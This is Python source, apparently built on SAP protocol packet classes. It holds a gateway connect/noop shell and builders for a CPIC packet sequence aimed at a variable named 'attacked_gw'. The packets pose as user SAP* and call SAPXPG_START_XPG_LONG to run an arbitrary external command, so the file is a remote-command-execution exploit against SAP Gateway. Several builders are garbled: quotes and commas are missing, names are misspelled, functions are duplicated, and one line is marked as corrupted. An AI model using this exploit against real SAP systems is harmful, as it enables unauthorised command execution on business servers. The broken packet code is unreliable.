def do_connect(self, args):
    """Open an NI socket to the Gateway service and verify it answers.

    Host, port and the optional SAP Router route string are taken from
    ``self.options``; the protocol version from the ``version`` runtime
    option. ``self.connected`` is set only after the gateway accepted the
    initial check packet. Socket errors are reported via ``self._error``
    and leave ``self.connected`` untouched. ``args`` is unused (command
    shell signature).
    """
    host = self.options.remote_host
    port = self.options.remote_port

    # Establish the transport first; on failure report and bail out.
    try:
        self.connection = SAPRoutedStreamSocket.get_nisocket(
            host, port, self.options.route_string, base_cls=SAPRFC)
    except SocketError as e:
        self._error("Error connecting with the Gateway service")
        self._error(str(e))
        return

    self._print("Attached to %s / %d" % (host, port))

    # req_type=1 is the "check gateway" request; the reply itself is not
    # inspected, only whether the send succeeds.
    check_packet = SAPRFC(version=int(self.runtimeoptions["version"]),
                          req_type=1)
    self._debug("Sending check gateway packet")
    try:
        self.connection.send(check_packet)
    except SocketError:
        self._error("Error connecting to the gateway monitor service")
    else:
        self.connected = True
def do_noop(self, args):
    """Send a no-operation command to the connected Gateway service.

    Requires a prior successful ``do_connect``; otherwise an error is
    printed and nothing is sent. Whatever ``send`` returns is discarded.
    ``args`` is unused (command shell signature).
    """
    if not self.connected:
        self._error("You need to connect to the server first !")
        return

    # req_type=9 / cmd=1 is the noop command for the gateway monitor.
    noop_packet = SAPRFC(version=int(self.runtimeoptions["version"]),
                         req_type=9, cmd=1)
    self._debug("Sending noop packet")
    self.connection.send(noop_packet)
def build_p2(): dt_structure = SAPRFCDTStruct(version=96, padd1='\x00\x00\x00\x00\x00\x00\x00\x00', root_id = '\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00', conn_id = '\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0', conn_id_suff=0, timeout =-1, keepalive_timeout=-1, export_trace=2, start_type='DEFAULT', net_protocol=10, local_addrv6='::{}'.format(attacked_gw['ip']) long_lu = attacked_gw['ip'], padd3 = '\x00' * 16, user= '******', padd4 = '\x20' * 8, padd5 = '\x00' * 4, padd6 = '\x20' * 12, padd7 = '\x00' * 16, addr_ipv4=attacked_gw['ip'], padd8 = '\x00' * 4, long_tp = 'sapxpg', ) ext_inf = SAPRFCEXTEND(short_dest_name=attacked_gw['dest_name'], ncpic_lu='196.168.50.46' ncpic_tp='sapxpg' ctypes='STARTED_PRG', clientInfo=1, ncpic_parameters_padd='\x00\x00', comm_idx=0, conn_idx=65535, ) p2 = SAPRFC(version=6,func_type='F_SAP_INIT', protocol = 'CPIC', MODE=0, UID=19, gw_id=65535, err_len=0, info2='WITH_LONG_LU_NAME', trace_level=0, time=0 info='GW_EXTENDED_INIT_OPTIONS+GW_DIST_TRACE', padd_appc=0, vector=0, appc_rc='CM_OK', sap_rc=0, sap_ext_header =ext_inf, sap_param=dt_structure ) #p2.show2() return p2
def build_p1(ip, inbr):
    """Build the initial client registration packet for the Gateway.

    Args:
        ip: value placed in the packet's ``address`` field.
        inbr: instance number; both ``service`` and ``tp`` are set to
            ``sapgw<inbr>``.

    Returns:
        A ``SAPRFC`` packet with ``req_type='GW_NORMAL_CLIENT'``,
        APPC header version 6 and an 8-space (empty) conversation id.
    """
    # service and tp carry the same gateway name, so compute it once.
    gateway_name = 'sapgw{}'.format(inbr)
    return SAPRFC(
        version=2,
        req_type='GW_NORMAL_CLIENT',
        address=ip,
        service=gateway_name,
        codepage=4103,
        lu='sapserve',
        tp=gateway_name,
        conversation_id=' ' * 8,
        appc_header_version=6,
        accept_info='EINFO+PING+CONN_EINFO',
        idx=-1,
    )
def build_p3(conv_id): cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['Kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) xpg = SAPRFXPG( xpg_padd100='\x05\x12\x02\x05', xpg_convid_1='CONVID', xpg_padd101='\x02\x05\x02\x05', xpg_strstat_l='STRTSTAT', xpg=padd102='\x02\x05\x02\x05', xpg_xpgid_l='XPGID', xpg_padd103='\x02\x05\x02\x01', xpg_extprog_l='EXTPROG', xpg_padd104='\x02\x01\x02\x03', xpg_extprog_val='{: <128}'.format(cmd), xpg_padd105='\x02\x03\x02\x01', xpg_longparam_l='LONG_PARAMS', xpg_padd106='\x02\x01\x02\x03', xpg_longparam_val='{: <1024}'.format(cmd_lparams), xpg_padd107='\x02\x03\x02\x01', xpg_param_1='PARAMS', xpg_padd108='\x02\x01\x02\x03', xpg_stderrcntl_1='STDERRCNTL', xpg_padd110='\x02\x01\x02\x03', xpg_stderrcntl_val='M', xpg_padd111='\x02\x03\x02\x01', 
xpg_stdinctl_1='STDINCNTL', xpg_padd112='\x02\x01\x02\x03', xpg_stdinctl_val='M', xpg_padd113='\x02\x03\x02\x01', xpg_stdoutcntl_l='STDOUTCNTL', xpg_padd114='\x02\x01\x02\x03', xpg_stdountcntl_val='M', xpg_padd115='\x02\x03\x02\x01', xpg_termcntl_1='TERMCNTL', xpg_padd116='\x02\x01\x02\x03', xpg_termcntl_val='C', xpg_padd117='\x02\x03\x02\x01', xpg_trcaecntl='TRACECNTL', xpg_padd118='\x02\x01\x02\x03', xpg_tacecntl_val='6', xpg_padd119='\x02\x03\x03\x01', xpg_log_l='LOG', xpg_padd120='\x03\x01\x03\x30', xpg_log_val1='\x00\x00\x00\x01', xpg_padd121='\x03\x30\x03\x02', xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_params2 = SAPCPICPARAM2(# dunno why this value param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', param2 = '\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1 = '\x81\xe3',#session ist part param_sess_2 = '\x09\xf6\xf1\x18',#session 2nd part mask='225.0.0.0', ip= attacked_gw['ip'], #Extremely cricital and dangerous flag=1, ) cpic_params2=SAPCPICPARAM2(#dunno ths values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', #session mask='160.10.0.12', ip = '41.0.153.208', #Dangerous and critical ) th = SAPRFCTHStruct( th_eyecl="*TH*", th_version=3, th_len=230, th_trace_flag=0, th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attcked_gw[hostname],attacked_gw['sid'],attacked_gw['instance']), th_service=1, th_service=1, th_userid='SAP*', th_action='SM49', th_acttype=1, th_pressysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attacked_gw['hostname'],attacked_gw['sid'],attacked_gw['instance']), th_id='37D581E3889AF16DA00A000C290099D0001', th_some_cpic_params=cpic_params, th_eyec2="*TH*", ) cpic = SAPCPIC( cpic_start_padd='\x01\x01\x00\x08', cpic_cpic_leng=257, cpic_padd003="\x01\x01\x01\x01", cpic_unk02="", cpic_padd0002='\x01\x01\x01\x03', cpic_unk01="\x00\x00\x06\x1b", cpic_padd0001="\x01\x03\x01\x06 cpic_ cpic_padd002="\x01\x01\x01\x03", cpic_unk02="\x00\x00\x06\x1b", cpic_padd001="\x01\x03\x01\x06", cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23", 
cpic_padd001="\x01\x06\x00\x07", cpic_ip='un #corrupted ) p3 = SAPRFC(version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info3=0, timeout=500,#timeout im miliiseconds info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info = 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00'*31 + '\x02', sap_cpic=cpic, cpic_packet_size=len(cpic), rfc_packet_size=28000, ) #p3.show2() return p3
def buld_p4(conv_id): cpic_params = SAPCPICPARAM( param1='\x00\x99\xd0\x1e', param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1='\x81\xe3', # session 1st part? param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? mask='160.10.0.12', ip='41.0.153.208', flag=2, ) cpic_params2 = SAPCPICPARAM2( #dunno why this values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', mask='160.10.0.12', ip='41.0.153.208', ) sap_xpg_end = SAPRFXPG_END( xpg_end_padd001='\x05\x12\x02\x05', xpg_end_ecode_l='EXITCODE', xpg_end_padd002='\x02\x05\x02\x05', xpg_end_estat_l='STRTSTAT', xpg_end_padd003='\x02\x05\x03\x01', xpg_end_log_l='LOG', xpg_end_padd004='\x03\x01\x03\x30', xpg_end_unk1='\x00\x00\x00\x01', xpg_end_padd005='\x03\x30\x03\x02', xpg_end_unk2='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2= '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4= '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15= 
'\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) cpic2 = SAPCPIC2( cpic_padd015_1='\x01\x36', some_cpic_params=cpic_params, cpic_padd016='\x01\x36\x05\x02', cpic_convid_label='', cpic_padd017='\x05\x02\x00\x0b', cpic_kernel3=attacked_gw['kernel'], cpic_padd018='\x00\x0b\x01\x02', cpic_RFC_f='SAPXPG_END_XPG', cpic_padd019='\x01\x02\x05\x03', cpic_unk4='', cpic_padd021='\x05\x03\x05\x14', some_cpic_params2=cpic_params2, cpic_padd022='\x05\x14\x04\x20', cpic_unk6='\x00\x00\x00\x00', cpic_padd023='\x04\x20\x05\x12', cpic_unk7='', xpg_end=sap_xpg_end, cpic_padd024='\x03\x02\x01\x04', cpic_suff=cpic_suf, cpic_end_padd='\x01\x04\xff\xff', cpic_end='', cpic_end_sig='\xff\xff\x00\x00', ) p4 = SAPRFC( version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info2=0, trace_level=0, time=0, info3=0, timeout=500, info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info= 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00' * 31 + '\x02', sap_cpic_cut=cpic2, cpic_packet_size=len(cpic2), rfc_packet_size=28000, ) #p4.show2() return p4
def buld_p3(conv_id): cpic_suf = SAPCPICSUFFIX( suff_padd1='\x10\x04\x02', suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8', suff_padd2='\x10\x04\x0b', suff_unk2= '\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00', suff_padd3='\x10\x04\x04', suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07', suff_padd4='\x10\x04\x0d', suff_unk4= '\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c', suff_padd5='\x10\x04\x16', suff_unk5='\x00\x11', suff_padd6='\x10\x04\x17', suff_unk6='\x00\x22', suff_padd7='\x10\x04\x19', suff_unk7='\x00\x00', suff_padd8='\x10\x04\x1e', suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58', suff_padd9='\x10\x04\x25', suff_unk9='\x00\x01', suff_padd10k='\x10\x04\x09', suff_kernel=attacked_gw['kernel'], suff_padd10='\x10\x04\x1d', suff_unk10='\x30', suff_padd11='\x10\x04\x1f', suff_cli1='Windows 7 Professional 6.1 (7601) Servic', suff_padd12='\x10\x04\x20', suff_cli2='IE 9.10.9200.16618', suff_padd13='\x10\x04\x21', suff_cli3='Office 12', suff_padd14='\x10\x04\x24', suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80', suff_padd15='\x10\x04\x13', suff_unk15= '\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00', ) xpg = SAPRFXPG( xpg_padd100='\x05\x12\x02\x05', xpg_convid_l='CONVID', xpg_padd101='\x02\x05\x02\x05', xpg_strstat_l='STRTSTAT', xpg_padd102='\x02\x05\x02\x05', xpg_xpgid_l='XPGID', xpg_padd103='\x02\x05\x02\x01', xpg_extprog_l='EXTPROG', xpg_padd104='\x02\x01\x02\x03', xpg_extprog_val='{: <128}'.format(cmd), xpg_padd105='\x02\x03\x02\x01', xpg_longparam_l='LONG_PARAMS', xpg_padd106='\x02\x01\x02\x03', xpg_longparam_val='{: <1024}'.format(cmd_lparams), xpg_padd107='\x02\x03\x02\x01', xpg_param_l='PARAMS', xpg_padd108='\x02\x01\x02\x03', xpg_param_val='{: <255}'.format(cmd_params), xpg_padd109='\x02\x03\x02\x01', xpg_stderrcntl_l='STDERRCNTL', 
xpg_padd110='\x02\x01\x02\x03', xpg_stderrcntl_val='M', xpg_padd111='\x02\x03\x02\x01', xpg_stdincntl_l='STDINCNTL', xpg_padd112='\x02\x01\x02\x03', xpg_stdincntl_val='R', xpg_padd113='\x02\x03\x02\x01', xpg_stdoutcntl_l='STDOUTCNTL', xpg_padd114='\x02\x01\x02\x03', xpg_stdoutcntl_val='M', xpg_padd115='\x02\x03\x02\x01', xpg_termcntl_l='TERMCNTL', xpg_padd116='\x02\x01\x02\x03', xpg_termcntl_val='C', xpg_padd117='\x02\x03\x02\x01', xpg_tracecntl_l='TRACECNTL', xpg_padd118='\x02\x01\x02\x03', xpg_tracecntl_val='6', xpg_padd119='\x02\x03\x03\x01', xpg_log_l='LOG', xpg_padd120='\x03\x01\x03\x30', xpg_log_val1='\x00\x00\x00\x01', xpg_padd121='\x03\x30\x03\x02', xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00', ) cpic_params = SAPCPICPARAM( param1='\x00\x99\xd0\x1e', param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5', param_sess_1='\x81\xe3', # session 1st part? param_sess_2='\x09\xf6\xf1\x18', # session 2nd part? mask='225.0.0.0', ip=attacked_gw['ip'], flag=1, ) cpic_params2 = SAPCPICPARAM2( #dunno why this values param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', mask='160.10.0.12', ip='41.0.153.208', ) th = SAPRFCTHStruct( th_eyec1="*TH*", th_version=3, th_len=230, th_trace_flag=0, th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), th_serevice=1, th_userid='SAP*', th_action='SM49', th_acttype=1, th_presysid='{}/{}_{}_{}'.format(attacked_gw["sid"], attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), th_id='37D581E3889AF16DA00A000C290099D0001', th_some_cpic_params=cpic_params, th_eyec2="*TH*", ) cpic = SAPCPIC( cpic_start_padd='\x01\x01\x00\x08', cpic_cpic_length=257, cpic_padd0003="\x01\x01\x01\x01", cpic_unk02="", cpic_padd0002="\x01\x01\x01\x03", cpic_unk01="\x00\x00\x06\x1b", cpic_padd0001="\x01\x03\x01\x06", cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23", cpic_padd001="\x01\x06\x00\x07", cpic_ip='{: <15}'.format(attacked_gw['ip']), cpic_padd002='\x00\x07\x00\x18', 
cpic_ip2=attacked_gw['ip'], cpic_padd003='\x00\x18\x00\x08', cpic_host_sid_inbr='{}_{}_{}'.format(attacked_gw['hostname'], attacked_gw['sid'], attacked_gw['instance']), cpic_padd004='\x00\x08\x00\x11', cpic_rfc_type='3', cpic_padd005='\x00\x11\x00\x13', cpic_kernel1='{} '.format(attacked_gw['kernel']), cpic_padd006='\x00\x13\x00\x12', cpic_kernel2='{} '.format(attacked_gw['kernel']), cpic_padd007='\x00\x12\x00\x06', cpic_dest=attacked_gw['dest_name'], cpic_padd008='\x00\x06\x01\x30', cpic_program='SAPLSSXP', cpic_padd009='\x01\x30\x01\x11', cpic_username1='SAP*', cpic_padd010='\x01\x11\x01\x14', cpic_cli_nbr1=attacked_gw['cli_nbr'], cpic_padd011='\x01\x14\x01\x15', cpic_unk1='E', cpic_padd012='\x01\x15\x00\x09', cpic_username2='SAP*', cpic_padd013='\x00\x09\x01\x34', cpic_cli_nbr2=attacked_gw['cli_nbr'], cpic_padd014='\x01\x34\x05\x01', cpic_unk2='\x01', cpic_padd015_0='\x05\x01', # <---- cpic_padd015_1='\x01\x36', # <---- some_cpic_params=cpic_params, cpic_padd016='\x01\x36\x05\x02', cpic_convid_label='', cpic_padd017='\x05\x02\x00\x0b', cpic_kernel3=attacked_gw['kernel'], cpic_padd018='\x00\x0b\x01\x02', cpic_RFC_f='SAPXPG_START_XPG_LONG', cpic_padd019='\x01\x02\x05\x03', cpic_unk4='', cpic_padd020='\x05\x03\x01\x31', cpic_th_struct=th, cpic_padd021='\x01\x31\x05\x14', some_cpic_params2=cpic_params2, cpic_padd022='\x05\x14\x04\x20', cpic_unk6='\x00\x00\x00\x00', cpic_padd023='\x04\x20\x05\x12', cpic_unk7='', xpg_p=xpg, cpic_padd024='\x03\x02\x01\x04', cpic_suff=cpic_suf, cpic_end_padd='\x01\x04\xff\xff', cpic_end='', cpic_end_sig='\xff\xff\x00\x00', ) p3 = SAPRFC( version=6, func_type='F_SAP_SEND', protocol='CPIC', mode=0, uid=19, gw_id=1, err_len=0, info2=0, trace_level=0, time=0, info3=0, timeout=500, info4=0, seq_no=0, sap_param_len=8, padd_appc=0, info= 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM', vector='F_V_SEND_DATA+F_V_RECEIVE', appc_rc='CM_OK', sap_rc=0, conv_id=conv_id, cm_ok_padd='\x00' * 31 + '\x02', sap_cpic=cpic, 
cpic_packet_size=len(cpic), rfc_packet_size=28000, ) #p3.show2() return p3